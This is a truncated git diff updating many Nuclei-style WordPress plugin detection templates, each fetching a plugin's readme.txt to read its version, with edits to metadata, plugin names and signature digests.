b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d450c37f13b5bcca1b0269cfcc8a65c1e12bcc2a6c53d134f43381939638dcb022013dbb9a40591ab506a6ae6c3dfd8b9450646fcbdd0dd9cb0075a3a9f8a147f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index be44dbf40a..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/jetpack-boost/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f843e5cbd4da4c80a614c7b5580465676ac123640458efe8a5ce749be07db5f7022016c3f9ea51f41d607e93123d19ff4cf5605311f4a7b4b5abb0722772f8c187d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index b2e778983d..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d3ad56eb0cb94f9181e52702471bcdb569805488d581cfa7f3e8738b858563b0221009652cb8340b961750515b675eadef9aa0b186a51248564179b3393e6188e31ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index d2b6656fd6..299e5e4cb6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -1,19 +1,19 @@ id: wordpress-kadence-blocks info: - name: Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection + name: Gutenberg Blocks with AI by Kadence WP – Page Builder Features Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab238da46d59975e969e3289ef84cb175729bffcde2a3a7c759961b10aa826be022100b961fe78553b28d33c17168ad7d2c463d75d8a1571014a368619e015c96e554b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index f762210946..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061bc74b273e5cc19339da2f641c951df5b61978aa7ff7460b35f0f709757841602205fb3f6fa4d77e7e195e9e876bb7380cc3ac665eec40d707556a942334e60cc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 2390749ba8..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031e75cfa396ed64b4299a0f2767d465a3fa58d5f74aebb85cbbd6c799c92c67202210084c95979cd97be3377aa939e6e2fbff153e74827a52d09c96a975651a52d3eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index e8a6611d01..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a56735a7dfc0faf6d71782f03f91892ecc870370fdff020767cd5c94685a62ba0220575c4acc5ad5746b871235ca8f5e47a9e5ccfcc371fefa95cc8edb89e38560b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3dd2983b57..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200dbbcde44c92838da41546d5534dee15608d37f243982c29c26bd5e0a555f86002206afa926ac90ed15da4cd534fdacc03b9d4a097920f191ee98f34fdd7f96c4e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 4551016e68..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec9e03c0d7a7fe909c32a1f46b12a4fd9a8c18f458107b056f7a436cab0218f4022100acf765f39e89de791ee70b585237cc7839be3c71a911f0d12df6d02e7f4682b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 78cdf3725a..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098a6d74a6724c2cf06a1fad9052a07afc98e88027490e3cd0b3814bb8b4b3f9902203a5381716d67ea320819cb838facea806f8817bfb75317c45f76e5f68e514cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 63d2c28648..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d9ee5e8dd8b938fab4d00d67cda282c6df3392fd9cfadd40eca306967d3d0f00220425d2d2f6adba4fa0f55975adddd5117a9d855c9ac821dd2e62f61ffa54a976c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index d3ee16715a..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009968ca76b979eca20539040a83b50ff17f53b51c8c8dd6e6d6ec8526d2ca9a03022100883b3e14eec183f79b82f96ad363b22cf7fc733a0d3144b875999963edaaf24b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index edd99d5837..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d25c16a0c13dcf0668e49c7440a6b0eb99a1cf3ecee3cb8175547e3bae4b769502205fa098262d9b15c129fc36ba94772437c5ad4950a719b350fd536da64cba415d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 196f845938..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c7b7b108592d38de3147d8fdd6846ec47b10608eae950a3ea72c4609c0528b602210084423e26d9622ea9cce9757f2e5b9ba7d1c540a3797baed1999a1e3f11ce38e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 1fe56ad369..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c227ece2f66372c37767d97885371787b570f10f2cf27ab11957c86a1d25c28022100bbf41a04320dfc3ac519b42f0b7f5cd8f94b1459773d31023997d3b8bec0cce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 51c150d348..5685dd5f08 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -1,19 +1,19 @@ id: wordpress-mainwp-child info: - name: MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection + name: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056271bec07b781f7051264e8a99867ae999ee5c70ab5db8783b582d1870028f3022100bef7113d02b65f7bca088834bdeede01067594d5ec89c05e4853b1131c591b9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 96fe503120..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201569339f2dc82d475ee4a606ae517bed5e66ab60259248d58e2ebc6334a3f65c022100cbb2e5cd12dd91e1e27e26c8e03713778a6c11ec2d257fe4d3b3ff4a8b7849fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 6cbccc9f8d..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220681925ab0e97e049c2a5a96c025ae5503e3b46b22324bbd671f54f65202e8fa702204f902011fff57f02fe58b41e4bc742848991cae0d873ecab9d80927c97f13fb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index cd25c97f1d..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b0416b522e7bfac5df416bf581abdeaf5eb451cc7771bf417aa35cf39a1b46f0220119459cf26910178199c1a8d0655b6ee92ab5e7ffbdfd7f21dd93fca31d0e4fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 0b1a7f7fc1..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea6c16908385a595802c62bfedc0277b42476dad59828688fa821fb233119c3e02200a325275ca4e36e53781beef9b4e7ffcdbc14e1c67b495302a507d680a9b538e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index b67c4eb1b3..effba09471 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -1,19 +1,19 @@ id: wordpress-metform info: - name: Metform Elementor Contact Form Builder Detection + name: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/metform/ metadata: - max-request: 1 plugin_namespace: metform wpscan: https://wpscan.com/plugin/metform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/metform/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200abff8d33a06a98ec0e5cb1d16dc93b7ea21f8753b536ab36a2af8907b3fed0302210092937d2d90d0f49a60a41afef745485d43293ce128d721887a80ee2df1fb9d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index c41eb742f4..37153b7ae5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -1,19 +1,19 @@ id: wordpress-ml-slider info: - name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Slideshows Detection + name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Image Slideshows Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203365c6028540c59138978a4404a9f748de8af5afa7053076faa750220325d201022100b60d1b08bd628e2d6a5dae0b18d7b568c96ff7b12614b0f0d536deb31356112d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index e9aacb0568..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc39d154ad72a19fc6762e7c3720e2ded14c9729402cfdd9b36e27cc50ff003b022066c0dd574bab6cc4c50fb74df12b62b8b12b193847e9bd62a44347d0691026b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index a3e71225f7..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d9149549d606fee366c96d72ea87cc4b237c27984a0a2e9367c119bf1a980e402200a04889a27ebc1f87d56145ee09cc299cfa43acc61acc820716aaa273a7b2e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index d91b481be8..3462f5ea6b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -1,19 +1,19 @@ id: wordpress-nextgen-gallery info: - name: WordPress Gallery Plugin – NextGEN Gallery Detection + name: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c1597465d04778c9d2b8c14dcf1d0ba872eb0d3de559b92a9378d2af59a76ea022100ebf5a34627e9508359b9739fb7eb430a49afdfddd7c64fa6533fc7caf19dad5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 08f568953e..5c9ae8bc4f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -1,19 +1,19 @@ id: wordpress-ninja-forms info: - name: Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection + name: Ninja Forms – The Contact Form Builder That Grows With You Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d596e46725dd6de4119f2a71712a92884d3639585abd29027e003470e479c98a02204fe4f2f7d097dad7ba853360f5fe6b3b9e27080c02bfbf9305a8c9c3278ae5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 6a21b4cc17..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220305477391c85f79f48193267d70af1db265323e48c8b65f2604356b1f941e31702202f9504bf17f0729548ea14c8ca492f70f9e0b0d422ff98903f07367b72dbb64b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 9ed2844321..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9caf240326ed0b090e038e93310b29c1473c6f0b351de901d1339b7673b63c7022044820af2e78248ce424cf59addaaed3ddb5ca9c7e30e80bad465bfae58c65c8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c77d713f34..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077972335c3a0d408f920e062b7610c78e6457a63ce1b23d4fb9c9cf8016063680221008f30b757a087268ff71d8a514e7ab401035fad4b0318ebcfa7b8fa8bdf2f1958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 281c7f3ac4..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b75698207fadd11fb78efe2641fe28cb3519845303976a97bad3dfe6fdf2d9b7022100a53e6c54b826da53d407481eae7add6662d3e149b51c404fdad24694220ca877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index ef98af34d4..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" @@ -47,4 +47,3 @@ 